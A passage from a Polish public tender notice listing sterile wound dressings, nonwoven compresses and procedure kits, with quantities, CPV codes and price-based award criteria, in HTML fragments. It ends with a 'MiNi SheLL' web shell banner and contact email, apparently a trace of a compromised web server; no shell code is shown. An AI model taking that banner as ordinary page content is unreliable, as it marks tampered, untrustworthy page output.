 	Jałowy opatrunek antybakteryjny, zawierający Ag, sterylny , pakowany pojedynczo a 10x10cm.              	szt	200	   
 	Hydroaktywny, jałowy opatrunek piankowy, na okolicę kości krzyżowej. Zewnętrzna warstwa opatrunku musi być pokryta warstwą poliuretanową, przepuszczalną dla powietrza lecz nie przepuszczalną dla płynów.	szt	15	   
 	Hydroaktywny, jałowy opatrunek z pianki poliuretanowej , samoprzylepny rozmiar- 10 x 10cm. 	szt	15	   
 	Hydroaktywny, jałowy opatrunek piankowy, na piety i łokcie. Zewnętrzna warstwa opatrunku musi być pokryta warstwą poliuretanową, przepuszczalną dla powietrza lecz nie przepuszczalną dla płynów.	szt	30	   
 	Amorficzny /bezpostaciowy/, przeźroczysty hydrożel, dozownik w formie strzykawki a 15 ml	szt	10	   
 	Opatrunek węglowy, chłonny, sterylny 10x10 cm 	szt	20	   
 	Opatrunek do ran wymagających aktywnego oczyszczenia, aktywowany roztworem Ringera, gotowy do użytku, działający 24 godziny , jałowy, średnica  - 10 cm	szt	20	   
 	 Opatrunek hydrokoloidowy, jałowy rozmiar 10x 10cm	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Kompresy włókninowe 40g/m2 4w 5x5 cm, jałowe, opak. a 5szt  	op	500	   
1	Kompresy włókninowe 40g/m2 4w 5x5 cm, jałowe, opak. a 10szt   	op	2000	   
2	Kompresy włókninowe 40g/m2 4w 7,5x7,5 cm, jałowe, opak  a  5szt    	op	2400	   
3	Kompresy włókninowe 40g/m2 4w 10x10 cm, jałowe , opak.a 5 szt.    	op	12000	   
4	Kompresy włókninowe 40g/m2 4w 10x10 cm, jałowe, opak. a 10 szt.   	op	2500	   
5	Kompresy włókninowe 40g/m2 4w 5x5 cm, niejałowe , opak.a 100 szt     	op	300	   
6	Kompresy włókninowe 40g/m2 4w 10x10 cm, niejałowe, opak. a100 szt.   	op	100	   
7	Kompresy włókninowe 40g/m2 4w 10x20 cm, jałowe, opak. a 2 szt.    	op	2000	   
8	Kompresy włókninowe 40g/m2 4w 10x20 cm, jałowe, opak. a 5 szt.     	op	4000	   
9	Kompresy włókninowe 40g/m2 4w 40x20 cm, jałowe a2	op	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.19-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jałowy zestaw do cewnikowania o składzie:
Tupfer kula 20x20 17n 6 szt
Anatomiczna penseta plastikowa 1szt.
Serweta podfoliowana 50x50 1szt.
Serweta podfoliowana 50x50 cm z otworem o średnicy 5cm i nacięciem
Opakowanie typu twardy blister dwukomorowe, zawierający tródzielną etykietę typu tag z dwoma naklejkami do uzupełniania dokumentacji medycznej	zestaw	50	   
2	Jałowy zestaw do znieczulenia PP o składzie:
Kompres gazowy 13n 8w 10x10cm 10szt.
Anatomiczna penseta plastikowa 1szt.
Serweta z laminatu dwuwarstwowego o gramaturze min. 56 g/m2 90x80cm 2szt.
Zestaw pakowany w torebkę papierowo- foliową zawierający tródzielną etykietę typu tag z dwoma naklejkami do uzupełniania dokumentacji medycznej	zestaw	50	   
3	Jałowy zestaw do centralnego wkłucia o składzie:
Kompres gazowy 17n 8w 7,5x7,5 5szt.
Tupfer kula 20x20 6szt.
Anatomiczna penseta plastikowa 1szt.
Nożyczki jednorazowe 1szt.
Imadło plastikowe 1szt.
Serweta z laminatu dwuwarstwowego o gramaturze min. 43 g/m2 45x75 cm z otworem lepnym 10cm
Serweta z włókniny typu SMS o gramaturze 35g/m2 50x50 cm
Zestaw pakowany w torebkę papierowo- foliową zawierający tródzielną etykietę typu tag z dwoma naklejkami do uzupełniania dokumentacji medycznej	zestaw	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.18-0, 33.14.11.16-6, 33.14.11.14-2, 33.14.11.15-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com